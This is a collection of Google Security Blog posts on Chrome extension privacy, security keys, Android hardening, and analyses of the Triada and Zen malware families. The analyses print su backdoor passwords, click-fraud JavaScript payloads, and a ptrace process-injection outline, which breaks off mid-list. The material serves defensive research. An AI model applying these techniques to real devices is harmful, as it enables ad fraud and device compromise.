Google Security Blog

Improving Security and Privacy for Extensions Users

Google Security Blog - Wed, 06/12/2019 - 1:02pm
No, Chrome isn’t killing ad blockers -- we’re making them safer
Posted by Devlin Cronin, Chrome Extensions Team
The Chrome Extensions ecosystem has seen incredible advancement, adoption, and growth since its launch over ten years ago. Extensions are a great way for users to customize their experience in Chrome and on the web. As this system grows and expands in both reach and power, user safety and protection remains a core focus of the Chromium project.
In October, we announced a number of changes to improve the security, privacy, and performance of Chrome extensions. These changes include increased user options to control extension permissions, changes to the review process and readability requirements, and requiring two-step verification for developers. In addition, we’ve helped curb abuse through restricting inline installation on websites, preventing the use of deceptive installation practices, and limiting the data collected by extensions. We’ve also made changes to the teams themselves — over the last year, we’ve increased the size of the engineering teams that work on extension abuse by over 300% and the number of reviewers by over 400%.
These and other changes have driven down the rate of malicious installations by 89% since early 2018. Today, we block approximately 1,800 malicious uploads a month, preventing them from ever reaching the store. While the Chrome team is proud of these improvements, the review process alone can't catch all abuse. In order to provide better protection to our users, we need to make changes to the platform as well. This is the suite of changes we’re calling Manifest V3.
This effort is motivated by a desire to keep users safe and to give them more visibility and control over the data they’re sharing with extensions. One way we are doing this is by helping users be deliberate in granting access to sensitive data - such as emails, photos, and access to social media accounts. As we make these changes we want to continue to support extensions in empowering users and enhancing their browsing experience.
To help with this balance, we’re reimagining the way a number of powerful APIs work. Instead of a user granting each extension access to all of their sensitive data, we are creating ways for developers to request access to only the data they need to accomplish the same functionality. One example of this is the introduction of the Declarative Net Request API, which is replacing parts of the Web Request API.
At a high level, this change means that an extension does not need access to all a user’s sensitive data in order to block content. With the current Web Request API, users grant permission for Chrome to pass all information about a network request - which can include things like emails, photos, or other private information - to the extension. In contrast, the Declarative Net Request API allows extensions to block content without requiring the user to grant access to any sensitive information. Additionally, because we are able to cut substantial overhead in the browser, the Declarative Net Request API can have significant, system-level performance benefits over Web Request.


This has been a controversial change since the Web Request API is used by many popular extensions, including ad blockers. We are not preventing the development of ad blockers or stopping users from blocking ads. Instead, we want to help developers, including content blockers, write extensions in a way that protects users’ privacy.
You can read more about the Declarative Net Request API and how it compares to the Web Request API here.
We understand that these changes will require developers to update the way in which their extensions operate. However, we think it is the right choice to enable users to limit the sensitive data they share with third-parties while giving them the ability to curate their own browsing experience. We are continuing to iterate on many aspects of the Manifest V3 design, and are working with the developer community to find solutions that both solve the use cases extensions have today and keep our users safe and in control.
Categories: Google Security Blog

Use your Android phone’s built-in security key to verify sign-in on iOS devices

Google Security Blog - Wed, 06/12/2019 - 12:00pm
Posted by Kaiyu Yan and Christiaan Brand
Compromised credentials are one of the most common causes of security breaches. While Google automatically blocks the majority of unauthorized sign-in attempts, adding 2-Step Verification (2SV) considerably improves account security. At Cloud Next ‘19, we introduced a new 2SV method, enabling more than a billion users worldwide to better protect their accounts with a security key built into their Android phones.
This technology can be used to verify your sign-in to Google and Google Cloud services on Bluetooth-enabled Chrome OS, macOS, and Windows 10 devices. Starting today, you can use your Android phone to verify your sign-in on Apple iPads and iPhones as well.
Security keys
FIDO security keys provide the strongest protection against automated bots, bulk phishing, and targeted attacks by leveraging public key cryptography to verify your identity and URL of the login page, so that an attacker can’t access your account even if you are tricked into providing your username and password. Learn more by watching our presentation from Cloud Next ‘19.


On Chrome OS, macOS, and Windows 10 devices, we leverage the Chrome browser to communicate with your Android phone’s built-in security key over Bluetooth using FIDO’s CTAP2 protocol. On iOS devices, Google’s Smart Lock app is leveraged in place of the browser.


User experience on an iPad with Pixel 3

Until now, there were limited options for using FIDO2 security keys on iOS devices. Now, you can get the strongest 2SV method with the convenience of an Android phone that’s always in your pocket at no additional cost.
It’s easy to get started
Follow these simple steps to protect your Google Account today:
Step 1: Add the security key to your Google Account
  • Add your personal or work Google Account to your Android 7.0+ (Nougat) phone.
  • Make sure you’re enrolled in 2-Step Verification (2SV).
  • On your computer, visit the 2SV settings and click "Add security key".
  • Choose your Android phone from the list of available devices.
Step 2: Use your Android phone's built-in security key
You can find more detailed instructions here. Within enterprise organizations, admins can require the use of security keys for their users in G Suite and Google Cloud Platform (GCP), letting them choose between using a physical security key, an Android phone, or both.
We also recommend that you register a backup hardware security key (from Google or a number of other vendors) for your account and keep it in a safe place, so that you can gain access to your account if you lose your Android phone.
Categories: Google Security Blog

PHA Family Highlights: Triada

Google Security Blog - Thu, 06/06/2019 - 1:22pm
Posted by Lukasz Siewierski, Android Security & Privacy Team

We continue our PHA family highlights series with the Triada family, which was first discovered early in 2016. The main purpose of Triada apps was to install spam apps on a device that displays ads. The creators of Triada collected revenue from the ads displayed by the spam apps. The methods Triada used were complex and unusual for these types of apps. Triada apps started as rooting trojans, but as Google Play Protect strengthened defenses against rooting exploits, Triada apps were forced to adapt, progressing to a system image backdoor. However, thanks to OEM cooperation and our outreach efforts, OEMs prepared system images with security updates that removed the Triada infection.
History of TriadaTriada was first described in a blog post on the Kaspersky Lab website in March 2016 and in a follow-up blog post in June 2016. Back then, it was a rooting trojan that tried to exploit the device and after getting elevated privileges, it performed a host of different actions. To hide these actions from analysts, Triada used a combination of dynamic code loading and additional app installs. The Kaspersky posts detail the code injection technique used by Triada and provide some statistics on infected devices at the time. In this post, we’ll focus on the peculiar encryption routine and the unusual binary files used by Triada.
Triada’s first action was to install a type of superuser (su) binary file. This su binary allowed other apps on the device to use root permissions. The su binary used by Triada required a password, so was unique compared to regular su binary files common with other Linux systems.
The binary accepted two passwords, od2gf04pd9 and ac32dorbdq. This is illustrated in the IDA screenshot below. Depending on which one was provided, the binary either 1) ran the command given as an argument as root or 2) concatenated all of the arguments, ran that concatenation preceded by sh, then ran them as root. Either way, the app had to know the correct password to run the command as root.
This Triada rooting trojan was mainly used to install apps and display ads. This trojan targeted older devices because the rooting exploits didn’t work on newer ones. Therefore, the trojan implemented a weight watching feature to decide if old apps needed to be deleted to make space for new installs.
Weight watching included several steps and attempted to free up space on the device’s user partition and system partition. Using a blacklist and whitelist of apps it first removed all the apps on its blacklist. If more free space was required it would remove all other apps leaving only the apps on the whitelist. This process freed space while ensuring the apps needed for the phone to function properly were not removed.
Every app on the system partition had a number, or weight, associated with it. The weight was a sum of the number of apps installed on the same date as the app in question and the number of apps signed with the same certificate. The apps with the lowest weight were installed in isolation (that is, not on a day that the device system image was created) and weren’t signed by the OEM or weren’t part of a developer bundle. In the weight watching process, these apps were removed first, until enough space was made for the new app.
su binary accepts two passwordsIn addition to installing apps that display ads, Triada injected code into four web browsers: AOSP (com.android.browser), 360 Secure (com.qihoo.browser), Cheetah (com.ijinshan.browser_fast), and Oupeng (com.oupeng.browser). The code was injected using the same technique described in our blog post about the Zen PHA family and in previously mentioned Kaspersky blog posts.
The web browser injection was done to overwrite the URLs and substitute ad banners on websites with ads benefiting the Triada authors.
Triada also used a peculiar and complex communication encryption routine. Whenever it had to send a request to the Command and Control (C&C) server, it encrypted the request using two XOR loops with different passwords. Because of XOR rules, if the passwords had the same character in the same position, those characters weren’t encrypted. The encrypted request was saved to a file, which had the same name as its size. Finally, the file was zipped and sent to the C&C server in the POST request body.
The example below illustrates one such request. The yellow bytes are the zip file’s signature of the central directory file header. The red bytes show the uncompressed file size of 0x0952. The blue bytes show the file name length (4) and the name itself (2386, a decimal version of 0x0952).
09 00 00 50 4B 01 02 14 00 14 00 08 00 08 00 4F ...PK..........O
91 F3 48 AE CF 91 D5 B1 04 00 00 52 09 00 00 04 ..H........R....
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 32 33 38 36 50 4B 05 06 00 00 00 00 01 00 01 .2386PK.........
00 32 00 00 00 E3 04 00 00 00 00 .2.........
The underlying data protocol changed periodically. It was either a simple JSON, a list of key-value pairs similar to the properties file, or a proprietary format as shown below.
[collect_Head]device=Nexus 5X
[collect_Space]xadevicekey=xxxxx

[collect_Space]collentmod=opappresultmode
[collect_Space]registerUser=true
[collect_End]
When Triada was discovered, we implemented detection that removed Triada samples from all devices with Google Play Protect. This implementation, combined with the increased security on newer Android devices, made it significantly harder for Triada to infect devices.
When rooting doesn’t work…During the summer of 2017 we noticed a change in new Triada samples. Instead of rooting the device to obtain elevating privileges, Triada evolved to become a pre-installed Android framework backdoor. The changes to Triada included an additional call in the Android framework log function, demonstrated below with a highlighted configuration string.
LABEL+13:
V18 = -1;
LABEL_18:
j___config_log_println(v7, v6, v10, v11, "cf89450001");
if ( v10 )
This backdoored log function version of Triada was first described by Dr.Web in July 2017. The blog post includes a description of Triada code injection methods.
By backdooring the log function, the additional code executes every time the log method is called (that is, every time any app on the phone tries to log something). These log attempts happen many times per second, so the additional code is running non-stop. The additional code also executes in the context of the app logging a message, so Triada can execute code in any app context. The code injection framework in early versions of Triada worked on Android releases prior to Marshmallow.
The main purpose of the backdoor function was to execute code in another app’s context. The backdoor attempts to execute additional code every time the app needs to log something. Triada developers created a new file format, which we called MMD, based on the file header.
The MMD format was an encrypted version of a DEX file, which was then executed in the app context. The encryption algorithm was a double XOR loop with two different passwords. The format is illustrated below.
Each MMD file had a specific file name of the format <MD5 of the process name>36.jmd. By using the MD5 of the process name, the Triada authors tried to obscure the injection target. However, the pool of all available process names is fairly small, so this hash was easily reversible.
We identified two code injection targets: com.android.systemui (the System UI app) and com.android.vending (the Google Play app). The first target was injected to get the GET_REAL_TASKS permission. This is a signature-level permission, which means that it can’t be held by ordinary Android apps.
Starting with Android Lollipop, the getRecentTasks() method is deprecated to protect users' privacy. However, apps holding the GET_REAL_TASKS permission can get the result of this method call. To hold the GET_REAL_TASKS permission, an app has to be signed with a specific certificate, the device’s platform cert, which is held by the OEM. Triada didn’t have access to this cert. Instead it executed additional code in the System UI app, which has the GET_REAL_TASKS permission.
The injected code returned the app running on top (the activity running in the foreground and being actively used by the device user) to other apps on the device. This app was exposed using two methods: an intent or a socket created for this purpose. When an app on the device sent the intent or wrote to a socket created by Triada’s code injection, it received the package name of the app running on top. Triada used the package name to determine if an ad was displayed. The assumption was that if the app running on top was a browser, the user would expect to see some ads, so Triada displayed ads from the background.
The second injection target was the Google Play app. This injection supported five commands and responses to them. The supported commands are shown below in Chinese, a language that was used throughout the Triada app and injection. English translations are given on the right.
  1. 下载请求
  2. 下载结果
  3. 安装请求
  4. 安装结果
  5. 激活请求
  6. 激活结果
  7. 拉活请求
  8. 拉活结果
  9. 卸载请求
  10. 卸载结果
  1. download request
  2. download result
  3. install request
  4. installation result
  5. activation request
  6. activation result
  7. pull request
  8. pull the results
  9. uninstall request
  10. uninstall result
The commands trigger the heartbeat (pull request), download, installation, uninstallation (in the Google Play app context), and activation (the first execution) of the apps. In the Google Play app context, installation meant that Triada didn’t have to turn on installation from unknown sources and all app installs looked like they were from Google Play.
The apps were downloaded from the C&C server and the communication with the C&C was encrypted using the same custom encryption routine using double XOR and zip. The downloaded and installed apps used the package names of unpopular apps available on Google Play. They didn’t have any relation to the apps on Google Play apart from the same package name.
The last piece of the puzzle was the way the backdoor in the log function communicated with the installed apps. This communication prompted the investigation: the change in Triada behavior mentioned at the beginning of this section made it appear that there was another component on the system image. The apps could communicate with the Triada backdoor by logging a line with a specific predefined tag and message.
The reverse communication was more complicated. The backdoor used Java properties to relay a message to the app. These properties were key-value pairs similar to Android system properties, but they were scoped to a specific process. Setting one of these properties in one app context ensures that other apps won’t see this property. Despite that, some versions of Triada indiscriminately created the properties in every single app process.
The diagram below illustrates the communication mechanisms of the Triada backdoor.
Communication mechanisms of TriadaReverse engineering countermeasures and developmentThe Triada backdoor was hidden to make the analysis harder. The strings in the Android framework library that related to Triada activities were encrypted, as shown below.
Android framework stringsThe strings were encrypted using the algorithm of two XOR loops. However, the first highlighted string, 36.jmd, wasn’t encrypted. This is the MMD file name string mentioned before.
Another anti-analysis measure implemented by the Triada authors was function padding, including additional exported functions that don't serve any purpose apart from making the file size bigger and the function layout more random with every compilation. Four types of these functions are shown in the screenshots below.
Example of function paddingOne final interesting feature of Triada worth mentioning is the development cycle. By analyzing subsequent versions of the Triada backdoor (up to 1.5.1) we saw the changes in the code. In the newest version, they substituted MD5 with SHA1. This is used to hash the filenames, which come from a restricted pool of values. The newest version also encrypted the 36.jmd string and introduced changes to the code for compatibility with Android Nougat.
There are also code stubs pointing at the modification of the SystemUI and WebView Android framework elements. We couldn’t find the code that was executed by these modifications, just code stubs suggesting more development in the future.
OEM outreachTriada infects device system images through a third-party during the production process. Sometimes OEMs want to include features that aren’t part of the Android Open Source Project, such as face unlock. The OEM might partner with a third-party that can develop the desired feature and send the whole system image to that vendor for development.
Based on analysis, we believe that a vendor using the name Yehuo or Blazefire infected the returned system image with Triada.
Production process with malicious partyWe coordinated with the affected OEMs to provide system updates and remove traces of Triada. We also scan for Triada and similar threats on all Android devices.
OEMs should ensure that all third-party code is reviewed and can be tracked to its source. Additionally, any functionality added to the system image should only support requested features. It’s a good practice to perform a security review of a system image after adding third-party code.
SummaryTriada was inconspicuously included in the system image as third-party code for additional features requested by the OEMs. This highlights the need for thorough ongoing security reviews of system images before the device is sold to the users as well as any time they get updated over-the-air (OTA).
By working with the OEMs and supplying them with instructions for removing the threat from devices, we reduced the spread of preinstalled Triada variants and removed infections from the devices through the OTA updates.
The Triada case is a good example of how Android malware authors are becoming more adept. This case also shows that it’s harder to infect Android devices, especially if the malware author requires privilege elevation.
We are also performing a security review of system images through the Build Test Suite. You can read more about this program in the Android Security 2018 Year in Review report. Triada indicators of compromise are one of many signatures included in the system image scan. Additionally, Google Play Protect continues to track and remove any known versions of Triada and Triada-related apps it detects from user devices.

Categories: Google Security Blog

Quantifying Measurable Security

Google Security Blog - Mon, 06/03/2019 - 9:48am
Posted by Eugene Liderman, Android Security & Privacy Team
With Google I/O this week you are going to hear about a lot of new features in Android that are coming in Q. One thing that you will also hear about is how every new Android release comes with dozens of security and privacy enhancements. We have been continually investing in our layered security approach which is also referred to as“ defense-in-depth”. These defenses start with hardware-based security, moving up the stack to the Linux kernel with app sandboxing. On top of that, we provide built-in security services designed to protect against malware and phishing.
However layered security doesn’t just apply to the technology. It also applies to the people and the process. Both Android and Chrome OS have dedicated security teams who are tasked with continually enhancing the security of these operating systems through new features and anti-exploitation techniques. In addition, each team leverages a mature and comprehensive security development lifecycle process to ensure that security is always part of the process and not an afterthought.
Secure by design is not the only thing that Android and Chrome OS have in common. Both operating systems also share numerous key security concepts, including:
  • Heavily relying on hardware based security for things like rollback prevention and verified boot
  • Continued investment in anti-exploitation techniques so that a bug or vulnerability does not become exploitable
  • Implementing two copies of the OS in order to support seamless updates that run in the background and notify the user when the device is ready to boot the new version
  • Splitting up feature and security updates and providing a frequent cadence of security updates
  • Providing built-in anti-malware and anti-phishing solutions through Google Play Protect and Google Safe Browsing
On the Android Security & Privacy team we’re always trying to find ways to assess our ongoing security investments; we often refer to this as measurable security. One way we measure our ongoing investments is through third party analyst research such as Gartner’s May 2019 Mobile OSs and Device Security: A Comparison of Platforms report (subscription required). For those not familiar with this report, it’s a comprehensive comparison between “the core OS security features that are built into various mobile device platforms, as well as enterprise management capabilities.” In this year’s report, Gartner provides “a comparison of the out-of-the-box controls under the category “Built-In Security”. In the second part, called “Corporate-Managed Security, [Gartner] compares the enterprise management controls available for the latest versions of the major mobile device platforms”. Here is how our operating systems and devices ranked:
  • Android 9 (Pie) scored “strong” in 26 out of 30 categories
  • Pixel 3 with Titan M received “strong” ratings in 27 of the 30 categories, and had the most “strong” ratings in the built-in security section out of all devices evaluated (15 out of 17)
  • Chrome OS was added in this year's report and received strong ratings in 27 of the 30 categories.
Check out the video of Patrick Hevesi, who was the lead analyst on the report, introducing the 2019 report, the methodology and what went into this year's criteria.

You can see a breakdown of all of the categories in the table below:


Take a look at all of the great security and privacy enhancements that came in Pie by reading Android Pie à la mode: Security & Privacy. Also be sure to live stream our Android Q security update at Google IO titled: Security on Android: What's Next on Thursday at 8:30am Pacific Time.
Categories: Google Security Blog

Queue the Hardening Enhancements

Google Security Blog - Wed, 05/29/2019 - 12:32pm

Posted by Jeff Vander Stoep, Android Security & Privacy Team and Chong Zhang, Android Media Team

[Cross-posted from the Android Developers Blog]

Android Q Beta versions are now publicly available. Among the various new features introduced in Android Q are some important security hardening changes. While exciting new security features are added in each Android release, hardening generally refers to security improvements made to existing components.

When prioritizing platform hardening, we analyze data from a number of sources including our vulnerability rewards program (VRP). Past security issues provide useful insight into which components can use additional hardening. Android publishes monthly security bulletins which include fixes for all the high/critical severity vulnerabilities in the Android Open Source Project (AOSP) reported through our VRP. While fixing vulnerabilities is necessary, we also get a lot of value from the metadata - analysis on the location and class of vulnerabilities. With this insight we can apply the following strategies to our existing components:

  • Contain: isolating and de-privileging components, particularly ones that handle untrusted content. This includes:
    • Access control: adding permission checks, increasing the granularity of permission checks, or switching to safer defaults (for example, default deny).
    • Attack surface reduction: reducing the number of entry/exit points (i.e. principle of least privilege).
    • Architectural decomposition: breaking privileged processes into less privileged components and applying attack surface reduction.
  • Mitigate: Assume vulnerabilities exist and actively defend against classes of vulnerabilities or common exploitation techniques.

Here’s a look at high severity vulnerabilities by component and cause from 2018:

Most of Android’s vulnerabilities occur in the media and bluetooth components. Use-after-free (UAF), integer overflows, and out of bounds (OOB) reads/writes comprise 90% of vulnerabilities with OOB being the most common.

A Constrained Sandbox for Software Codecs

In Android Q, we moved software codecs out of the main mediacodec service into a constrained sandbox. This is a big step forward in our effort to improve security by isolating various media components into less privileged sandboxes. As Mark Brand of Project Zero points out in his Return To Libstagefright blog post, constrained sandboxes are not where an attacker wants to end up. In 2018, approximately 80% of the critical/high severity vulnerabilities in media components occurred in software codecs, meaning further isolating them is a big improvement. Due to the increased protection provided by the new mediaswcodec sandbox, these same vulnerabilities will receive a lower severity based on Android’s severity guidelines.

The following figure shows an overview of the evolution of media services layout in the recent Android releases.

  • Prior to N, media services are all inside one monolithic mediaserver process, and the extractors run inside the client.
  • In N, we delivered a major security re-architect, where a number of lower-level media services are spun off into individual service processes with reduced privilege sandboxes. Extractors are moved into server side, and put into a constrained sandbox. Only a couple of higher-level functionalities remained in mediaserver itself.
  • In O, the services are “treblized,” and further deprivileged that is, separated into individual sandboxes and converted into HALs. The media.codec service became a HAL while still hosting both software and hardware codec implementations.
  • In Q, the software codecs are extracted from the media.codec process, and moved back to system side. It becomes a system service that exposes the codec HAL interface. Selinux policy and seccomp filters are further tightened up for this process. In particular, while the previous mediacodec process had access to device drivers for hardware accelerated codecs, the software codec process has no access to device drivers.

With this move, we now have the two primary sources for media vulnerabilities tightly sandboxed within constrained processes. Software codecs are similar to extractors in that they both have extensive code parsing bitstreams from untrusted sources. Once a vulnerability is identified in the source code, it can be triggered by sending a crafted media file to media APIs (such as MediaExtractor or MediaCodec). Sandboxing these two services allows us to reduce the severity of potential security vulnerabilities without compromising performance.

In addition to constraining riskier codecs, a lot of work has also gone into preventing common types of vulnerabilities.

Bound Sanitizer

Incorrect or missing memory bounds checking on arrays account for about 34% of Android’s userspace vulnerabilities. In cases where the array size is known at compile time, LLVM’s bound sanitizer (BoundSan) can automatically instrument arrays to prevent overflows and fail safely.

BoundSan instrumentation

BoundSan is enabled in 11 media codecs and throughout the Bluetooth stack for Android Q. By optimizing away a number of unnecessary checks the performance overhead was reduced to less than 1%. BoundSan has already found/prevented potential vulnerabilities in codecs and Bluetooth.

More integer sanitizer in more places

Android pioneered the production use of sanitizers in Android Nougat when we first started rolling out integer sanization (IntSan) in the media frameworks. This work has continued with each release and has been very successful in preventing otherwise exploitable vulnerabilities. For example, new IntSan coverage in Android Pie mitigated 11 critical vulnerabilities. Enabling IntSan is challenging because overflows are generally benign and unsigned integer overflows are well defined and sometimes intentional. This is quite different from the bound sanitizer where OOB reads/writes are always unintended and often exploitable. Enabling Intsan has been a multi year project, but with Q we have fully enabled it across the media frameworks with the inclusion of 11 more codecs.

IntSan Instrumentation

IntSan works by instrumenting arithmetic operations to abort when an overflow occurs. This instrumentation can have an impact on performance, so evaluating the impact on CPU usage is necessary. In cases where performance impact was too high, we identified hot functions and individually disabled IntSan on those functions after manually reviewing them for integer safety.

BoundSan and IntSan are considered strong mitigations because (where applied) they prevent the root cause of memory safety vulnerabilities. The class of mitigations described next target common exploitation techniques. These mitigations are considered to be probabilistic because they make exploitation more difficult by limiting how a vulnerability may be used.

Shadow Call Stack

LLVM’s Control Flow Integrity (CFI) was enabled in the media frameworks, Bluetooth, and NFC in Android Pie. CFI makes code reuse attacks more difficult by protecting the forward-edges of the call graph, such as function pointers and virtual functions. Android Q uses LLVM’s Shadow Call Stack (SCS) to protect return addresses, protecting the backwards-edge of control flow graph. SCS accomplishes this by storing return addresses in a separate shadow stack which is protected from leakage by storing its location in the x18 register, which is now reserved by the compiler.

SCS Instrumentation

SCS has negligible performance overhead and a small memory increase due to the separate stack. In Android Q, SCS has been turned on in portions of the Bluetooth stack and is also available for the kernel. We’ll share more on that in an upcoming post.

eXecute-Only Memory

Like SCS, eXecute-Only Memory (XOM) aims at making common exploitation techniques more expensive. It does so by strengthening the protections already provided by address space layout randomization (ASLR) which in turn makes code reuse attacks more difficult by requiring attackers to first leak the location of the code they intend to reuse. This often means that an attacker now needs two vulnerabilities, a read primitive and a write primitive, where previously just a write primitive was necessary in order to achieve their goals. XOM protects against leaks (memory disclosures of code segments) by making code unreadable. Attempts to read execute-only code results in the process aborting safely.

Tombstone from a XOM abort

Starting in Android Q, platform-provided AArch64 code segments in binaries and libraries are loaded as execute-only. Not all devices will immediately receive the benefit as this enforcement has hardware dependencies (ARMv8.2+) and kernel dependencies (Linux 4.9+, CONFIG_ARM64_UAO). For apps with a targetSdkVersion lower than Q, Android’s zygote process will relax the protection in order to avoid potential app breakage, but 64 bit system processes (for example, mediaextractor, init, vold, etc.) are protected. XOM protections are applied at compile-time and have no memory or CPU overhead.

Scudo Hardened Allocator

Scudo is a dynamic heap allocator designed to be resilient against heap related vulnerabilities such as:

  • Use-after-frees: by quarantining freed blocks.
  • Double-frees: by tracking chunk states.
  • Buffer overflows: by check summing headers.
  • Heap sprays and layout manipulation: by improved randomization.

Scudo does not prevent exploitation but rather proactively manages memory in a way to make exploitation more difficult. It is configurable on a per-process basis depending on performance requirements. Scudo is enabled in extractors and codecs in the media frameworks.

Tombstone from Scudo aborts

Contributing security improvements to Open Source

AOSP makes use of a number of Open Source Projects to build and secure Android. Google is actively contributing back to these projects in a number of security critical areas:

Thank you to Ivan Lozano, Kevin Deus, Kostya Kortchinsky, Kostya Serebryany, and Mike Antares for their contributions to this post.

Categories: Google Security Blog

PHA Family Highlights: Zen and its cousins

Google Security Blog - Tue, 05/21/2019 - 2:03pm
table, th, td { border: 1px solid black;
Posted by Lukasz Siewierski, Android Security & Privacy Team
Google Play Protect detects Potentially Harmful Applications (PHAs) which Google Play Protect defines as any mobile app that poses a potential security risk to users or to user data—commonly referred to as "malware." in a variety of ways, such as static analysis, dynamic analysis, and machine learning. While our systems are great at automatically detecting and protecting against PHAs, we believe the best security comes from the combination of automated scanning and skilled human review.
With this blog series we will be sharing our research analysis with the research and broader security community, starting with the PHA family, Zen. Zen uses root permissions on a device to automatically enable a service that creates fake Google accounts. These accounts are created by abusing accessibility services. Zen apps gain access to root permissions from a rooting trojan in its infection chain. In this blog post, we do not differentiate between the rooting component and the component that abuses root: we refer to them interchangeably as Zen. We also describe apps that we think are coming from the same author or a group of authors. All of the PHAs that are mentioned in this blog post were detected and removed by Google Play Protect.
BackgroundUncovering PHAs takes a lot of detective work and unraveling the mystery of how they're possibly connected to other apps takes even more. PHA authors usually try to hide their tracks, so attribution is difficult. Sometimes, we can attribute different apps to the same author based on a small, unique pieces of evidence that suggest similarity, such as a repetition of an exceptionally rare code snippet, asset, or a particular string in the debug logs. Every once in a while, authors leave behind a trace that allows us to attribute not only similar apps, but also multiple different PHA families to the same group or person.
However, the actual timeline of the creation of different variants is unclear. In April 2013, we saw the first sample, which made heavy use of dynamic code loading (i.e., fetching executable code from remote sources after the initial app is installed). Dynamic code loading makes it impossible to state what kind of PHA it was. This sample displayed ads from various sources. More recent variants blend rooting capabilities and click fraud. As rooting exploits on Android become less prevalent and lucrative, PHA authors adapt their abuse or monetization strategy to focus on tactics like click fraud.
This post doesn't follow the chronological evolution of Zen, but instead covers relevant samples from least to most complex.
Apps with a custom-made advertisement SDKThe simplest PHA from the author's portfolio used a specially crafted advertisement SDK to create a proxy for all ads-related network traffic. By proxying all requests through a custom server, the real source of ads is opaque. This example shows one possible implementation of this technique.

This approach allows the authors to combine ads from third-party advertising networks with ads they created for their own apps. It may even allow them to sell ad space directly to application developers. The advertisement SDK also collects statistics about clicks and impressions to make it easier to track revenue. Selling the ad traffic directly or displaying ads from other sources in a very large volume can provide direct profit to the app author from the advertisers.
We have seen two types of apps that use this custom-made SDK. The first are games of very low quality that mimic the experience of popular mobile games. While the counterfeit games claim to provide similar functionality to the popular apps, they are simply used to display ads through a custom advertisement SDK.
The second type of apps reveals an evolution in the author's tactics. Instead of implementing very basic gameplay, the authors pirated and repackaged the original game in their app and bundled with it their advertisement SDK. The only noticeable difference is the game has more ads, including ads on the very first screen.
In all cases, the ads are used to convince users to install other apps from different developer accounts, but written by the same group. Those apps use the same techniques to monetize their actions.
Click fraud appsThe authors' tactics evolved from advertisement spam to real PHA (Click Fraud). Click fraud PHAs simulate user clicks on ads instead of simply displaying ads and waiting for users to click them. This allows the PHA authors to monetize their apps more effectively than through regular advertising. This behavior negatively impacts advertisement networks and their clients because advertising budget is spent without acquiring real customers, and impacts user experience by consuming their data plan resources.
The click fraud PHA requests a URL to the advertising network directly instead of proxying it through an additional SDK. The command & control server (C&C server) returns the URL to click along with a very long list of additional parameters in JSON format. After rendering the ad on the screen, the app tries to identify the part of the advertisement website to click. If that part is found, the app loads Javascript snippets from the JSON parameters to click a button or other HTML element, simulating a real user click. Because a user interacting with an ad often leads to a higher chance of the user purchasing something, ad networks often "pay per click" to developers who host their ads. Therefore, by simulating fraudulent clicks, these developers are making money without requiring a user to click on an advertisement.
This example code shows a JSON reply returned by the C&C server. It has been shortened for brevity.
{
"data": [{
"id": "107",
"url": "<ayud_url>",
"click_type": "2",
"keywords_js": [{
"keyword": "<a class=\"show_hide btnnext\"",
"js": "javascript:window:document.getElementsByClassName(\"show_hide btnnext\")[0].click();",
{
"keyword": "value=\"Subscribe\" id=\"sub-click\"",
"js": "javascript:window:document.getElementById(\"sub-click\").click();"Based on this JSON reply, the app looks for an HTML snippet that corresponds to the active element (show_hide btnnext) and, if found, the Javascript snippet tries to perform a click() method on it.
Rooting trojansThe Zen authors have also created a rooting trojan. Using a publicly available rooting framework, the PHA attempts to root devices and gain persistence on them by reinstalling itself on the system partition of rooted device. Installing apps on the system partition makes it harder for the user to remove the app.
This technique only works for unpatched devices running Android 4.3 or lower. Devices running Android 4.4 and higher are protected by Verified Boot.
Zen's rooting trojan apps target a specific device model with a very specific system image. After achieving root access the app tries to replace the framework.jar file on the system partition. Replicating framework.jar allows the app to intercept and modify the behavior of the Android standard API. In particular, these apps try to add an additional method called statistics() into the Activity class. When inserted, this method runs every time any Activity object in any Android app is created. This happens all the time in regular Android apps, as Activity is one of the fundamental Android UI elements. The only purpose of this method is to connect to the C&C server.
The Zen trojanAfter achieving persistence, the trojan downloads additional payloads, including another trojan called Zen. Zen requires root to work correctly on the Android operating system.
The Zen trojan uses its root privileges to turn on accessibility service (a service used to allow Android users with disabilities to use their devices) for itself by writing to a system-wide setting value enabled_accessibility_services. Zen doesn't even check for the root privilege: it just assumes it has it. This leads us to believe that Zen is just part of a larger infection chain. The trojan implements three accessibility services directed at different Android API levels and uses these accessibility services, chosen by checking the operating system version, to create new Google accounts. This is done by opening the Google account creation process and parsing the current view. The app then clicks the appropriate buttons, scrollbars, and other UI elements to go through account sign-up without user intervention.
During the account sign-up process, Google may flag the account creation attempt as suspicious and prompt the app to solve a CAPTCHA. To get around this, the app then uses its root privilege to inject code into the Setup Wizard, extract the CAPTCHA image, and sends it to a remote server to try to solve the CAPTCHA. It is unclear if the remote server is capable of solving the CAPTCHA image automatically or if this is done manually by a human in the background. After the server returns the solution, the app enters it into the appropriate text field to complete the CAPTCHA challenge.
The Zen trojan does not implement any kind of obfuscation except for one string that is encoded using Base64 encoding. It's one of the strings - "How you'll sign in" - that it looks for during the account creation process. The code snippet below shows part of the screen parsing process.
if (!title.containsKey("Enter the code")) {
if (!title.containsKey("Basic information")) {
if (!title.containsKey(new String(android.util.Base64.decode("SG93IHlvdeKAmWxsIHNpZ24gaW4=".getBytes(), 0)))) {
if (!title.containsKey("Create password")) {
if (!title.containsKey("Add phone number")) {
Apart from injecting code to read the CAPTCHA, the app also injects its own code into the system_server process, which requires root privileges. This indicates that the app tries to hide itself from any anti-PHA systems that look for a specific app process name or does not have the ability to scan the memory of the system_server process.
The app also creates hooks to prevent the phone from rebooting, going to sleep or allowing the user from pressing hardware buttons during the account creation process. These hooks are created using the root access and a custom native code called Lmt_INJECT, although the algorithm for this is well known.
First, the app has to turn off SELinux protection. Then the app finds a process id value for the process it wants to inject with code. This is done using a series of syscalls as outlined below. The "source process" refers to the Zen trojan running as root, while the "target process" refers to the process to which the code is injected and [pid] refers to the target process pid value.
  1. The source process checks the mapping between a process id and a process name. This is done by reading the /proc/[pid]/cmdline file.
    This very first step fails in Android 7.0 and higher, even with a root permission. The /proc filesystem is now mounted with a hidepid=2 parameter, which means that the process cannot access other process /proc/[pid] directory.
  2. A ptrace_attach syscall is called. This allows the source process to trace the target.
  3. The source process looks at its own memory to calculate the offset between the beginning of the libc library and the mmap address.
  4. The source process reads /proc/[pid]/maps to find where libc is located in the target process memory. By adding the previously calculated offset, it can get the address of the mmap function in the target process memory.
  5. The source process tries to determine the location of dlopen, dlsym, and dlclose functions in the target process. It uses the same technique as it used to determine the offset to the mmap function.
